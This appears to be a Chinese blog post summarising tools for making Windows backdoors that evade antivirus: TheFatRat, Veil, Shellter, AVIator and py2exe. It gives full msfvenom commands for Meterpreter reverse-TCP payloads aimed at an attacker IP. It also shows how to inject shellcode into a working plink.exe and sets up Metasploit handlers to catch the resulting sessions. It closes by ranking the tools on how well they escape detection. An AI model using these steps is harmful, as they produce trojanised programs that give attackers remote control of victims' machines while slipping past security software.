Windows免殺小結(工具篇)

windows免殺工具推薦:

TheFatRat:https://github.com/Screetsec/TheFatRat
安裝過程介紹得很詳細,這里稍微注意一下:

如果執行完該步驟:
./setup.sh
且檢查通過:
./chk_tools
運行主程序./fatrat時顯示不存在配置文件,則多進行幾次:./setup.sh

進入主程序后,先鍵入:6

選擇生成bat文件:

之后用msf進行監聽,在目標機器上執行.bat文件,免殺效果還行

Veil:https://github.com/Veil-Framework/Veil
安裝過程參考:Veil3.1免殺安裝
簡單使用過程:

./Veil.py
use 1
list  #查看payload
use 某個payload
options  #查看配置
set ...
generate

上傳繞過效果還行:

當然病毒查殺很容易查出來,可以作為上傳繞過手段

Shellter:
利用過程參考:Kali Shellter 5.1:動態ShellCode注入工具 繞過安全軟件
這里使用apt-get安裝:

apt-get install shellter 

安裝以后,從終端啟動:

wine shellter

鍵入“A”啟用自動模式

PE目標為plink.exe,這里我們復制一個到root目錄下

cp /usr/share/windows-binaries/plink.exe  /root

在提示PE目標時,輸入:root/plink.exe

當詢問是否啟用隱身模式時輸入:“Y”
在隱身模式新功能下,后門文件仍然具有原始文件的功能

當提示輸入Payloads時選擇“L”然后選擇“1” Meterpreter_Reverse_TCP

之后輸出攻擊方ip,監聽端口等等

Shellter將會在plink.exe中注入shellcode

這時我們發現跟原文件相比,root目錄下的plink.exe文件變大了些,說明注入完成

之后啟動msf:

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.x.x
set lport 6666
exploit

我們把plink.exe上傳到目標機

當我們用plink進行遠程登錄的時候,在kali中Metasploit也得到了一個session

老實說,我個人感覺msf得到的session不太穩定,建議提前使用:

set autorunscript migrate -f

注入到一個穩定的進程

AVIator工具:

AVIator是后門生成器實用程序,使用加密和注入技術來繞過AV檢測。
需要.Net 4.6.1環境才能成功編譯生成程序
項目地址:https://github.com/Ch0pin/AVIator

將msfvenom生成的shellcode輸入到該工具的payload里。AES KEY和IV默認就可以
點擊Encrypt,生成加密后的payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.107.129 LPORT=8888 -f csharp

目標操作系統根據實際情況選擇,這里選擇x86通用一些。
這里選擇注入類型,在內存中創建新類型。
另外也可以自定義圖標。

點擊generate exe后就可以生成exe后門程序了。
運行后可成功上線。

python打包exe

網上有很多靠python第三方工具來達到免殺效果的文章,也有python加載shellcode之類的文章。有pyinstaller、py2exe。這里說一種打包的方式Py2exe

在windows7虛擬機上安裝python3.4和py2exe(只支持python3.4,使用pip即可)

利用msfvenom生成py腳本:

msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.107.129  lport=7777 -f raw -o demo.py

創建setup.py

#!/usr/bin/python
# -*- coding: UTF-8 -*-
# 可能需要os.chdir修改路徑
from distutils.core import setup
import py2exe
setup(
name = 'Meter',
description = 'Python-based App',
version = '1.0',
console=['demo.py'],
options = {'py2exe': {'bundle_files': 1,'packages':'ctypes','includes': 'base64,sys,socket,struct,time,code,platform,getpass,shutil',}},
zipfile = None,
)

這里我們打包生成exe

python setup.py py2exe

使用msf進行監聽:

use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
set exitonsession false
exploit -j -z

我測試的時候是使用下面的命令進行監聽

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.107.129
set lport 7777

運行生成的demo.exe,成功反彈:

免殺是真的牛批!

綜上,經過本地測試和virustotal檢測:
免殺效果:py2exe > TheFatRat > Shellter > Veil = AVIator

Veil生成的惡意程序上傳到帶有騰訊電腦管家的主機中不會被殺死,能正常上傳,但能被查殺發現。
AVIator生成的惡意程序既能上傳又能繞過查殺檢測,但一運行就GG
py2exe賊穩

參考如下:


windows免殺工具三部曲(一)
windows免殺工具三部曲(二)

最后編輯于
?著作權歸作者所有,轉載或內容合作請聯系作者
平臺聲明:文章內容(如有圖片或視頻亦包括在內)由作者上傳并發布,文章內容僅代表作者本人觀點,簡書系信息發布平臺,僅提供信息存儲服務。
禁止轉載,如需轉載請通過簡信或評論聯系作者。